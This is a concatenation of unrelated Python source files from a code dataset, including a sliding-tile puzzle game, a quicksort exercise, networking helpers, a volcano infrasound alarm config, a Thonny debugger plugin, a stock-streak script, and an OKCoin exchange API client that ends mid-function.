-*-coding: utf-8 -*-\n\n# 'random' module is used to shuffle field, see:\n# https://docs.python.org/3/library/random.html#random.shuffle\nimport random\n\n\n# Empty tile, there's only one empty cell on a field:\nEMPTY_MARK = 'x'\n\n# Dictionary of possible moves if a form of:\n# key -> delta to move the empty tile on a field.\nMOVES = {\n\t'w': -4,\n\t's': 4,\n\t'a': -1,\n\t'd': 1,\n}\n\n\ndef shuffle_field():\n\t\"\"\"\n\tThis method is used to create a field at the very start of the game\n\t:return: list with 16 randomly shuffled tiles,\n\tone of which is a empty space.\n\t\"\"\"\n\t# field = [\n\t# \t1, 2, 3, 4, \n\t# \t5, 6, 7, 8, \n\t# \t9, 10, 11, 12, \n\t# \t13, 14, EMPTY_MARK, 15,\n\t# ]\n\tfield = list(range(1, 17))\n\tfield[-1] = EMPTY_MARK\n\trandom.shuffle(field)\n\treturn field\n\n\ndef print_field(field):\n\t\"\"\"\n\tThis method prints field to user.\n\t:param field: current field state to be printed.\n\t:return: None\n\t\"\"\"\n\tfor i in range(0, len(field), 4):\n\t\tprint(field[i:i+4])\n\tprint('\\n')\n\n\ndef is_game_finished(field):\n\t\"\"\"\n\tThis method checks if the game is finished.\n\t:param field: current field state.\n\t:return: True if the game is finished, False otherwise.\n\t\"\"\"\n\treturn field == [\n\t\t1, 2, 3, 4, \n\t\t5, 6, 7, 8, \n\t\t9, 10, 11, 12, \n\t\t13, 14, 15, EMPTY_MARK,\n\t]\n\n\ndef perform_move(field, key):\n\t\"\"\"\n\tMoves empty-tile inside the field.\n\t:param field: current field state.\n\t:param key: move direction.\n\t:return: new field state (after the move).\n\t:raises: IndexError if the move can't be done.\n\t\"\"\"\n\tindex = field.index(EMPTY_MARK)\n\tdelta = MOVES[key]\n\tif (12 <= index <= 15 and key == 's') or \\\n\t(0 <= index <= 3 and key == 'w') or \\\n\t(index % 4 == 0 and key == 'a') or \\\n\t(index % 4 == 3 and key == 'd'):\n\t\traise IndexError('Move can not be done!')\n\tnew_index = index + delta\n\tfield[index], field[new_index] = field[new_index], field[index]\n\treturn field\n\n\ndef handle_user_input():\n\t\"\"\"\n\tHandles user input. List of accepted moves:\n\t\t'w' - up,\n\t\t's' - down,\n\t\t'a' - left,\n\t\t'd' - right\n\t:return: current move.\n\t\"\"\"\n\tmessage = 'Make your move {}:'.format(\n\t\t', '.join(MOVES.keys())\n\t)\n\tmove = input(message)\n\twhile move not in MOVES.keys():\n\t\tmove = input(message)\n\treturn move\n\n\ndef main():\n\t\"\"\"\n\tThe main method. It starts when the program is called.\n\tIt also calls other methods.\n\t:return: None\n\t\"\"\"\n\tturns_count = 0\n\tfield = shuffle_field()\n\tprint_field(field)\n\twhile is_game_finished(field) == False:\n\t\ttry:\n\t\t\tmove = handle_user_input()\n\t\t\tfield = perform_move(field, move)\n\t\t\tprint_field(field)\n\t\texcept IndexError as ex:\n\t\t\tprint(ex)\n\n\n\nif __name__ == '__main__':\n\t# See what this means:\n\t# http://stackoverflow.com/questions/419163/what-does-if-name-main-do\n\tmain()","sub_path":"game_ex2_1.py","file_name":"game_ex2_1.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"65960158","text":"\n\"\"\"\nРеалізуйте швидкий алгоритм сортування QuickSort.\n\"\"\"\n\nN = 1000000 # Кількість елементів масиву.\n # Використовується у головній програмі для генерування масиву з випадкових чисел\n # Для повільних алгоритмів сортування з асимптотикою n**2 рекомендується\n # використовувати значення не більше 10к\n # Для швидких алгоритмів сортування з асимптотикою\n # nlog(n) встановіть значення 1 000 000\n\n# Sorting time: 14.171875\n\ndef sort(array):\n \"\"\" Сортування масиву\n :param array: Вхідний масив даних, що треба відсортувати.\n \"\"\"\n qsort(array, 0, len(array) - 1)\n\n\ndef qsort(array, a, b):\n # 1. Тривіальний випадок, коли [a, b] містить\n # лише один елемент, або порожній\n if a >= b:\n return\n\n pivot = array[a + (b - a) // 2] # опорний елемент\n # 2. Розбиваємо вхідний масив на дві частини так,\n # щоб ліва частина містили елементи масиву,\n # що менші або рівні за опорний,\n # а права - більші або рівні за опорний\n left = a\n right = b\n\n while True:\n while array[left] < pivot:\n left += 1\n\n while array[right] > pivot:\n right -= 1\n\n if left >= right:\n break\n\n array[left], array[right] = array[right], array[left]\n left += 1\n right -= 1\n\n qsort(array, a, right)\n qsort(array, right + 1, b)\n","sub_path":"labs/L09/task2/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"491598998","text":"def load_addr_list(filename):\n l = []\n with open(filename) as f:\n lines = f.readlines()\n for line in lines:\n if line:\n line = line.strip()\n if not line.startswith('#') and not line.startswith('//'):\n l.append(line)\n return l\n\n\ndef patch_dns(handler):\n from urllib3.util import connection\n _orig_create_connection = connection.create_connection\n\n def patched_create_connection(address, *args, **kwargs):\n host, port = address\n res = _orig_create_connection((handler(host), port), *args, **kwargs)\n return res\n\n connection.create_connection = patched_create_connection\n\ndef set_local_proxy():\n import socket\n import socks\n socks.set_default_proxy(socks.PROXY_TYPE_SOCKS5, \"127.0.0.1\", 2358)\n socket.socket = socks.socksocket\n\n\ndef create_socket(addr, default_ipv6=True):\n import socket\n host, port = addr\n res = socket.getaddrinfo(host, port, socket.AF_UNSPEC if default_ipv6 else socket.AF_INET,\n socket.SOCK_STREAM, 0, socket.AI_PASSIVE)[0]\n\n af, socktype, proto, _, sa = res \n\n s = socket.socket(af, socktype, proto) \n return s, sa\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"636982029","text":"alarm_type = 'Infrasound'\t\t\t# this designates which alarm module will be imported and executed\nalarm_name = 'KENI Infrasound'\t# this is the alarm name sent to icinga and in message alerts\n\n# Infrasound channels list\nSCNL=[\n{'scnl':'KENI.HDF.AV.01'\t, 'sta_lat': 60.6413700\t, 'sta_lon': -151.070200},\n{'scnl':'KENI.HDF.AV.02'\t, 'sta_lat': 60.6404567 , 'sta_lon': -151.070330},\n{'scnl':'KENI.HDF.AV.03'\t, 'sta_lat': 60.6406033\t, 'sta_lon': -151.072020},\n{'scnl':'KENI.HDF.AV.04'\t, 'sta_lat': 60.6412000\t, 'sta_lon': -151.073000},\n{'scnl':'KENI.HDF.AV.05'\t, 'sta_lat': 60.6415300\t, 'sta_lon': -151.072000},\n{'scnl':'KENI.HDF.AV.06'\t, 'sta_lat': 60.6409167 , 'sta_lon': -151.071170},\n]\n\n# Volcano list to be monitored\n# Need volcano name and location for each volcano\n# Azimuthal tolerance is in degrees\n# seismic_scnl is a list of seismic channels to be plotted with infrasound on detect\nVOLCANO=[\n {'volcano': 'Spurr', 'v_lat': 61.29897, 'v_lon': -152.25122, 'Azimuth_tolerance': 5, 'min_pa': 1.0, 'vmin':0.28, 'vmax':0.4,\n 'seismic_scnl': ['SPCP.BHZ.AV.--','SPCL.BHZ.AV.--','SPU.BHZ.AV.--']},\n\n {'volcano': 'Redoubt', 'v_lat': 60.48576, 'v_lon': -152.74282, 'Azimuth_tolerance': 5, 'min_pa': 1.0, 'vmin':0.28, 'vmax':0.4,\n 'seismic_scnl': ['RDDF.BHZ.AV.--','RDDF.BHZ.AV.--','RDSO.BHZ.AV.--']},\n\n{'volcano': 'Iliamna', 'v_lat': 60.03220, 'v_lon': -153.09002, 'Azimuth_tolerance': 5, 'min_pa': 0.8, 'vmin':0.28, 'vmax':0.4,\n 'seismic_scnl': ['ILSW.BHZ.AV.--','ILS.BHZ.AV.--','IVE.BHZ.AV.--']},\n\n {'volcano': 'Augustine', 'v_lat': 59.36107, 'v_lon': -153.42938, 'Azimuth_tolerance': 5, 'min_pa': 1.0, 'vmin':0.28, 'vmax':0.4,\n 'seismic_scnl': ['AUJA.BHZ.AV.--','AUJK.BHZ.AV.--','AUSS.BHZ.AV.--']},\n\n {'volcano': 'Fourpeaked', 'v_lat': 58.7625, 'v_lon': -153.6632, 'Azimuth_tolerance': 5, 'min_pa': 0.5, 'vmin':0.28, 'vmax':0.4,\n 'seismic_scnl': ['Q19K.BHZ.AV.--','KARR.BHZ.AV.--','KAHG.BHZ.AV.--']},\n\n {'volcano': 'Katmai', 'v_lat': 58.263132, 'v_lon': -155.148067, 'Azimuth_tolerance': 10, 'min_pa': 0.5, 'vmin':0.28, 'vmax':0.4,\n 'seismic_scnl': ['MGLS.BHZ.AV.--','KABU.BHZ.AV.--','ACH.BHZ.AV.--']},\n]\n\nduration = 3*60 # duration value in seconds\nlatency = 10.0 # seconds between timestamps and end of data window\ntaper_val = 5.0 # seconds to taper beginning and end of trace before filtering\nf1\t\t = 0.5 # minimum frequency for bandpass filter\nf2\t\t = 8.0 # maximum frequency for bandpass filter\n\ndigouti = (1/419430.0)/(0.0275)\t# convert counts to Pressure in Pa (Q330 + Chap Vx2 mics)\nmin_cc = 0.6\t\t\t\t\t# min normalized correlation coefficient to accept\nmin_chan = 3\t\t\t\t\t# minimum # of channels for code to run\ncc_shift_length = 3*100\t\t\t# maximum samples to shift in cross-correlation (usually at 50 sps)\n","sub_path":"alarm_configs/KENI_Infrasound_config.py","file_name":"KENI_Infrasound_config.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"195288468","text":"import os.path\nfrom threading import Thread\nfrom tkinter import messagebox\n\nfrom thonny import get_workbench, get_runner\nimport logging\n\n_server_started = False\n\n\ndef _start_debug_enabled():\n return (\n get_workbench().get_editor_notebook().get_current_editor() is not None\n and \"debug\" in get_runner().get_supported_features()\n )\n\n\ndef start_server():\n try:\n from birdseye import server\n\n server.app.run(\n port=get_workbench().get_option(\"run.birdseye_port\"), debug=False, use_reloader=False\n )\n except Exception:\n logging.getLogger(\"thonny\").exception(\"Problem running Birdseye server\")\n\n\ndef debug_with_birdseye():\n global _server_started\n\n try:\n import birdseye # @UnusedImport\n except ImportError:\n if messagebox.askyesno(\n _(\"About Birdseye\"),\n _(\n \"Birdseye is a Python debugger which needs to be installed separately.\\n\\n\"\n + \"Do you want to open the help page and learn more?\"\n ),\n ):\n get_workbench().open_help_topic(\"birdseye\")\n\n return\n\n if not _server_started:\n _server_started = True\n Thread(target=start_server, daemon=True).start()\n\n os.environ[\"BIRDSEYE_PORT\"] = str(get_workbench().get_option(\"run.birdseye_port\"))\n get_runner().execute_current(\"Birdseye\")\n\n\n# order_key makes the plugin to be loaded later than other same tier plugins\n# This way it gets positioned after main debug commands in the Run menu\nload_order_key = \"zz\"\n\n\ndef load_plugin():\n get_workbench().set_default(\"run.birdseye_port\", 7777)\n get_workbench().add_command(\n \"birdseye\",\n \"run\",\n _(\"Debug current script (birdseye)\"),\n debug_with_birdseye,\n caption=\"birdseye\",\n tester=_start_debug_enabled,\n default_sequence=\"\",\n group=10,\n image=os.path.join(os.path.dirname(__file__), \"..\", \"res\", \"birdseye.png\"),\n )\n","sub_path":"thonny/plugins/birdseye_frontend.py","file_name":"birdseye_frontend.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"51220473","text":"import pandas as pd\nimport numpy as np\nimport gettickers as gt\n\n\ndef ticker_streaks(ticker):\n fname = './CSVs/' + ticker + '.csv'\n df = pd.read_csv(fname, header=0,\n usecols=['date', 'adjClose', 'adjVolume'])\n df.drop(0, inplace=True)\n df = df[df['adjVolume'] != 0]\n df['returnFactor'] = 1 + df.adjClose.pct_change(1)\n df['retNextMonth'] = 1/(df.adjClose.pct_change(-4) + 1) - 1\n df['up'] = (df['returnFactor'] > 1).astype(int)\n\n df['switch'] = abs(df['up'] - df['up'].shift(periods=1))\n\n df['strkno'] = df.index\n df.loc[df['switch'] == 0, 'strkno'] = np.nan\n df.loc[1, 'strkno'] = 0\n df['strkno'] = df['strkno'].fillna(method='ffill')\n\n g = df.groupby('strkno').agg(\n startdate=pd.NamedAgg(column='date', aggfunc='min'),\n enddate=pd.NamedAgg(column='date', aggfunc='max'),\n length=pd.NamedAgg(column='date', aggfunc='count'),\n ret=pd.NamedAgg(column='returnFactor',\n aggfunc=lambda x: x.prod() - 1),\n fwd_ret=pd.NamedAgg(column='retNextMonth', aggfunc='last'),\n up=pd.NamedAgg(column='up', aggfunc='max'))\n g.reset_index(inplace=True)\n g.drop('strkno', axis=1, inplace=True)\n g['ticker'] = ticker\n g = g[g.length !=0]\n return g\n\nif __name__ == '__main__':\n allstreaks = pd.concat([ticker_streaks(s) for s in gt.get_tickers()],\n ignore_index=True)\n allstreaks.to_csv('streaks.csv', index=False)\n","sub_path":"strk.py","file_name":"strk.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"329001903","text":"\n\nfrom setuptools import setup, find_packages\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nsetup(\n name='pyCyAMatReader',\n version='0.0.3',\n description='Python interface for the AMatReader Cytoscape app',\n #url='',\n author='Brett Settle',\n #author_email='',\n license='MIT',\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 3 - Alpha',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ],\n keywords='Cytoscape',\n\tpackages=find_packages(),\n #install_requires=['peppercorn'],\n\n # To provide executable scripts, use entry points in preference to the\n # \"scripts\" keyword. Entry points provide cross-platform support and allow\n # pip to create the appropriate form of executable for the target platform.\n #entry_points={\n # 'console_scripts': [\n # 'newmodule=newmodule:main'\n # #'sample=sample:main',\n # ],\n #},\n)\n","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"241375631","text":"#Write a program to read through the mbox-short.txt and figure out who has the sent the greatest number of mail messages.\n# The program looks for 'From ' lines and takes the second word of those lines as the person who sent the mail.\n#The program creates a Python dictionary that maps the sender's mail address to a count of the number of times they appear in the file.\n#After the dictionary is produced, the program reads through the dictionary using a maximum loop to find the most prolific committer.\n\n#fname = input(\"Enter file name: \")\n#if len(fname) < 1 : fname = \"mbox-short.txt\"\n\nfh = open(\"mbox-short.txt\")\ncount = 0\nlst = list()\ndic = dict()\nfor line in fh:\n line = line.rstrip()\n if not line.startswith(\"From \"): continue\n lst = line.split()\n email = lst[1]\n dic[email] = dic.get(email,0)+1\n\nlargest = None\nfor a in dic:\n if largest is None or dic[a] > largest:\n largest = dic[a]\n address = a\n\nprint(address,largest)\n","sub_path":"Chap9_1.py","file_name":"Chap9_1.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"408823108","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#用于访问OKCOIN 现货REST API\nfrom HttpMD5Util import buildMySign,httpGet,httpPost\nimport json\n\"\"\"\nWe need to distinguish two kinds of exceptions, \none is that we cannot ever exploit the return result, then raise criticalException, \none is that some are errors while some are useable, then raise trivialException.\nAlso need to distinguish when to raise the exception, \nin SpotAPI or in the application program?\n\"\"\"\n__all__ = ['OKCoinSpotMarketData', 'OKCoinSpotAccount', 'OKCoinSpotTrade']\nclass OKCoinSpotMarketData:\n \"\"\"\n Spot Market Data\n \"\"\"\n def __init__(self,url,apikey,secretkey):\n self.__url = url\n self.__apikey = apikey\n self.__secretkey = secretkey\n\n #获取OKCOIN现货行情信息\n def ticker(self,symbol=''):\n \"\"\"\n @return {'date': 1499387332, \n 'ticker': {'buy': 18110.0, 'high': 18282.0, 'last': 18110.0, 'low': 17950.0, 'sell': 18119.98, 'vol': 6255.201}}\n \"\"\"\n TICKER_RESOURCE = \"/api/v1/ticker.do\"\n params=''\n if symbol:\n params += '&symbol=' + symbol if params else 'symbol=' +symbol\n data = httpGet(self.__url,TICKER_RESOURCE,params)\n data['date'] = int(data['date'])\n for k in data['ticker'].keys():\n data['ticker'][k] = float(data['ticker'][k])\n return data\n\n #获取OKCOIN现货市场深度信息\n # 其中merge应该是价格的精确度,使用默认版本depth() 获得200个depth信息,asks价格逐渐降低,bids价格逐渐升高,所以asks应该做反序处理\n # 更新时间 0.3s ~ 3s 甚至6s\n def depth(self,symbol='btc_cny',size = 0,merge = 0):\n \"\"\"\n @return orderbook\n @type: dict, {'asks':a list of [price (float), amount (int)], \n 'bids':a list of [price, amount]}. \n asks=list(reversed(orderbook['asks']))\n \"\"\"\n DEPTH_RESOURCE = \"/api/v1/depth.do\"\n params='symbol=%s'%(symbol)\n if size:\n params += '&size=' + str(size)\n if merge:\n params += '&merge=' + str(merge)\n data = httpGet(self.__url,DEPTH_RESOURCE,params)\n if 'asks' not in data:\n print(data)\n data['asks'] = list(reversed(data['asks']))\n return data\n\n #获取OKCOIN现货最近600交易信息\n #since\n #这600个交易信息平均跨越 10~20min,或者只有3min~5min\n #每两个相邻trade之间的更新为0s~7s之间,最高达到1min\n #拿到新tid的时间,也就是新trade的时间间隔,最低在0.2s徘徊,最高到1s, 6s甚至12s (其实和上面的两个相邻trade之间的interval测试相同)\n def trades(self,symbol = 'btc_cny', since = 0):\n \"\"\"\n @para since, return trades information from this tid. This tid is NOT included.\n @return trades: default length is 60, trades[-1] is the latest trade info\n @type: a list of {'amount': 0.028, 'date': 1499386972, 'date_ms': 1499386972000, 'price': 18112.0, 'tid': 7580841263, 'type': 'sell'}.\n\n @date_ms = date * 1000, wouldn' t be more concise than date\n \"\"\"\n TRADES_RESOURCE=\"/api/v1/trades.do\"\n params='symbol={}'.format(symbol)\n if since:\n params += '&since=' + str(since) if params else 'since=' +since\n trades = httpGet(self.__url,TRADES_RESOURCE,params)\n for trade in trades:\n trade['amount'] = float(trade['amount'])\n trade['price'] = float(trade['price'])\n return trades\n\n #获取OKCOIN现货历史K线数据\n def kline(self, symbol, dataType='1min', size=None, since=0):\n \"\"\"\n @para interval, 1min, 3min, 5min, 15min, 30min, 1day, 3day, 1week, 1hour, 2hour, 4hour, 6hour, 12hour\n @return a list of [timestamp, open, high, low, close, volume]\n \"\"\"\n KLINE = \"/api/v1/kline.do\"\n params='symbol={s}&type={t}'.format(s=symbol,t=dataType)\n if size:\n params += '&size=' + str(size) if params else 'size=' +str(size)\n if since:\n params += '&since='+str(since) if params else 'since='+str(since)\n return httpGet(self.__url,KLINE,params)\n\n #公共历史交易信息\n def trade_history(self,symbol,since):\n TRADE_HISTORY=\"/api/v1/trade_history.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'since':since\n }\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,TRADE_HISTORY,params)\n\n\n#####################################################################################\nclass OKCoinSpotAccount:\n \"\"\"\n Spot Account Info\n \"\"\"\n def __init__(self,url,apikey,secretkey):\n self.__url = url\n self.__apikey = apikey\n self.__secretkey = secretkey\n\n #获取用户现货账户信息\n def userinfo(self):\n \"\"\"\n @return userinfo,\n type dict, {'info': {'funds': {'asset': {'net': 3298.89, 'total': '3298.89'}, \n 'free': {'btc': 0.0, cny: 298.89, 'eth': 0.0, 'ltc': 0.0}, \n 'freezed': {'btc': 0.0, 'cny': 3000.0, 'eth': 0.0, 'ltc': 0.0}}}, \n 'result': True}\n \"\"\"\n USERINFO_RESOURCE = \"/api/v1/userinfo.do\"\n params ={}\n params['api_key'] = self.__apikey\n params['sign'] = buildMySign(params,self.__secretkey)\n data = httpPost(self.__url,USERINFO_RESOURCE,params)\n for key,val in data['info']['funds'].items(): # asset, free, freezed\n for y in val.keys(): # net, total\n val[y] = float(val[y])\n return data\n\n #现货订单信息查询\n def order_info(self,symbol,order_id):\n \"\"\"\n @para symbol, string, 'btc_cny'/'ltc_cny'/'eth_cny'\n @para order_id, long, -1 all open orders; if order_id is a specific id, return this order\n\n @return {'orders': [{'amount': 10, 'avg_price': 0, 'create_date': 1499430915000, \n 'deal_amount': 0, 'order_id': 11326282, 'orders_id': 11326282, \n 'price': 1, 'status': 0, 'symbol': 'eth_cny', 'type': 'buy'}], \n 'result': True}\n @return status -1 canceled, 0 open, 1 partial filled, 2 full filled, 4 in-cancel\n\n OR \n @return {'error_code': 10001, 'result': False}\n \"\"\"\n ORDER_INFO_RESOURCE = \"/api/v1/order_info.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'order_id':order_id\n }\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,ORDER_INFO_RESOURCE,params)\n\n #现货批量订单信息查询\n def orders_info(self,type,symbol,order_id):\n \"\"\"\n @para type, int, 0 open order, 1 crossed order\n @para order_id, string, order ids seperated by ',' \n\n @return dict [All values be their own type, int, float, string etc.]\n {'orders': [{'amount': 10000, 'avg_price': 0, 'create_date': 1499358526000, \n 'deal_amount': 0, 'order_id': 10720334, 'price': 0.1, \n 'status': 0, 'symbol': 'eth_cny', 'type': 'buy'}, \n {'amount': 10000, 'avg_price': 0, 'create_date': 1499358015000, \n 'deal_amount': 0, 'order_id': 10717356, 'price': 0.1, \n 'status': 0, 'symbol': 'eth_cny', 'type': 'buy'}], \n 'result': True}\n @return status -1 canceled, 0 open, 1 partial filled, 2 full filled, 4 in-cancel\n \"\"\"\n ORDERS_INFO_RESOURCE = \"/api/v1/orders_info.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'order_id':order_id,\n 'type':type\n }\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,ORDERS_INFO_RESOURCE,params)\n\n #现货获得最近两天订单信息\n def order_history(self, symbol, status, current_page, page_length):\n \"\"\"\n @para status, 0 open, 1 crossed\n @para current_page, current page number\n @para page_length, number of every page\n @return\n {'current_page': 1, \n 'orders': [{'amount': 10, 'avg_price': 0, 'create_date': 1499430915000, \n 'deal_amount': 0, 'order_id': 11326282, 'price': 1, \n 'status': 0, 'symbol': 'eth_cny', 'type': 'buy'}, \n {'amount': 10, 'avg_price': 0, 'create_date': 1499358526000, \n 'deal_amount': 0, 'order_id': 10720334, 'price': 0.1, \n 'status': 0, 'symbol': 'eth_cny', 'type': 'buy'}, \n {'amount': 10, 'avg_price': 0, 'create_date': 1499358508000, \n 'deal_amount': 0, 'order_id': 10720260, 'price': 0.1, \n 'status': 0, 'symbol': 'eth_cny', 'type': 'buy'}, \n {'amount': 10, 'avg_price': 0, 'create_date': 1499358015000, \n 'deal_amount': 0, 'order_id': 10717356, 'price': 0.1, \n 'status': 0, 'symbol': 'eth_cny', 'type': 'buy'}], \n 'page_length': 10, \n 'result': True, \n 'total': 0}\n \"\"\"\n ORDER_HISTORY_RESOURCE = \"/api/v1/order_history.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'status':status,\n 'current_page':current_page,\n 'page_length':page_length\n }\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,ORDER_HISTORY_RESOURCE,params)\n\n #获取放款深度前10\n def lend_depth(self,symbol):\n LEND_DEPTH = \"/api/v1/lend_depth.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n }\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,LEND_DEPTH,params)\n\n #查询借款信息\n def borrows_info(self,symbol):\n \"\"\"\n {'borrow_btc': 0, 'borrow_cny': 0, 'borrow_ltc': 0, 'can_borrow': 0, \n 'interest_btc': 0, 'interest_cny': 0, 'interest_ltc': 0, 'result': True, \n 'today_interest_btc': 0, 'today_interest_cny': 0, 'today_interest_ltc': 0}\n \"\"\"\n BORROWS_INFO = \"/api/v1/borrows_info.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n }\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,BORROWS_INFO,params)\n\n #借款订单记录\n def borrow_order_info(self,borrow_id):\n BORROW_ORDER_INFO = \"/api/v1/borrow_order_info.do\"\n params = {\n 'api_key':self.__apikey,\n 'borrow_id':borrow_id\n }\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,BORROW_ORDER_INFO,params)\n\n #未全款列表\n def unrepayments_info(self,symbol,current_page,page_length):\n UNREPAYMENTS_INFO = \"/api/v1/unrepayments_info.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'current_page':current_page,\n 'page_length':page_length\n }\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,UNREPAYMENTS_INFO,params)\n\n #充值提现记录\n def account_records(self,symbol,type,current_page,page_length):\n ACCOUNT_RECORDS = \"/api/v1/account_records.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'type':type,\n 'current_page':current_page,\n 'page_length':page_length\n }\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,ACCOUNT_RECORDS,params)\n\n\n#####################################################################################\nclass OKCoinSpotTrade:\n \"\"\"\n Spot Trade Execution\n \"\"\"\n def __init__(self,url,apikey,secretkey):\n self.__url = url\n self.__apikey = apikey\n self.__secretkey = secretkey\n\n #现货交易\n def trade(self,symbol,type,price=0.0,amount=0.0):\n \"\"\"\n @para type, 'sell'/'buy'\n @return tradeResult\n @type {'order_id': 10717356 (int), 'result': True}\n \"\"\"\n TRADE_RESOURCE = \"/api/v1/trade.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'type':type\n }\n if price:\n params['price'] = price\n if amount:\n params['amount'] = amount\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,TRADE_RESOURCE,params)\n\n def __batch_trade(self, params):\n \"\"\"\n @return \n {\n \"order_info\":[\n {\"order_id\":41724206},\n {\"error_code\":10011,\"order_id\":-1},\n {\"error_code\":10014,\"order_id\":-1}\n ],\n \"result\":true\n }\n \"\"\"\n BATCH_TRADE_RESOURCE = \"/api/v1/batch_trade.do\"\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,BATCH_TRADE_RESOURCE,params)\n\n # 现货批量下单(文档里说可以在orders_data里精细控制buy/sell,但实际中返回10008非法参数,问题没有解决;)\n # 这里直接要求返回data里有key order_info\n def batch_trade(self, symbol, type, orders_data):\n \"\"\"\n @para type, 'buy'/'sell'\n @orders_data [(1053.82, 6, 'buy'), (1053.43, 6, 'buy'), \n (1053.43, 1, 'sell'), (1053.43, 6, 'sell')], \n allow more than 5 now\n\n @return [{'error_code': 10000, 'result': False}, \n {'order_id': 11994552}, {'order_id': 11994553}, \n {'order_id': 11994554}, {'order_id': 11994555}, \n {'order_id': 11994556}, {'order_id': 11994557}]\n \"\"\"\n leng = len(orders_data)\n result = {'order_info':[], }\n ret = []\n i = 0\n while i < leng:\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'type':type,\n }\n end = (i + 5) if (i + 5 < leng) else leng\n tmp_lst = []\n for order in orders_data[i : end]:\n if len(order) == 3:\n tmp_lst.append('{' + 'price:{},amount:{},type:{}'.format(order[0],order[1],order[2]) + '}')\n else:\n tmp_lst.append('{' + 'price:{},amount:{}'.format(order[0],order[1]) + '}')\n params['orders_data'] = '[{}]'.format(','.join(tmp_lst))\n data = self.__batch_trade(params)\n if 'order_info' in data:\n ret.extend(data['order_info'])\n else:\n ret.append(data) # 一定是 error_code\n i = end\n return ret\n\n #现货取消订单\n def cancel_order(self,symbol,order_id):\n \"\"\"\n @para order_id, sperated by ',', most 3 IDs one time\n @return {'error': '1072033', 'success': '10720260,10720334'} or {'order_id': 10717356, 'result': True}\n \"\"\"\n CANCEL_ORDER_RESOURCE = \"/api/v1/cancel_order.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'order_id':order_id\n }\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,CANCEL_ORDER_RESOURCE,params)\n\n #提币\n def withdraw(self,symbol,chargefee,trade_pwd,withdraw_address,withdraw_amount,target):\n WITHDRAW = \"/api/v1/withdraw.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'chargefee':chargefee,\n 'trade_pwd':trade_pwd,\n 'withdraw_address':withdraw_address,\n 'withdraw_amount':withdraw_amount,\n 'target':target\n }\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,WITHDRAW,params)\n\n #取消提币\n def cancel_withdraw(self,symbol,withdraw_id):\n CANCEL_WITHDRAW = \"/api/v1/cancel_withdraw.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'withdraw_id':withdraw_id\n }\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,CANCEL_WITHDRAW,params)\n\n #申请借款\n def borrow_money(self,symbol,days,amount,rate,sign):\n BORROW_MONEY=\"/api/v1/borrow_money.do\"\n params = {\n 'api_key':self.__apikey,\n 'symbol':symbol,\n 'days':days,\n 'amount':amount,\n 'rate':rate\n }\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,BORROW_MONEY,params)\n\n #取消借款\n def cancel_borrow(self,borrow_id):\n CANCEL_BORROW = \"/api/v1/cancel_borrow.do\"\n params = {\n 'api_key':self.__apikey,\n 'borrow_id':borrow_id\n }\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,CANCEL_BORROW,params)\n\n #用户还全款\n def repayment(self,borrow_id):\n REPAYMENT=\"/api/v1/repayment.do\"\n params = {\n 'api_key':self.__apikey,\n 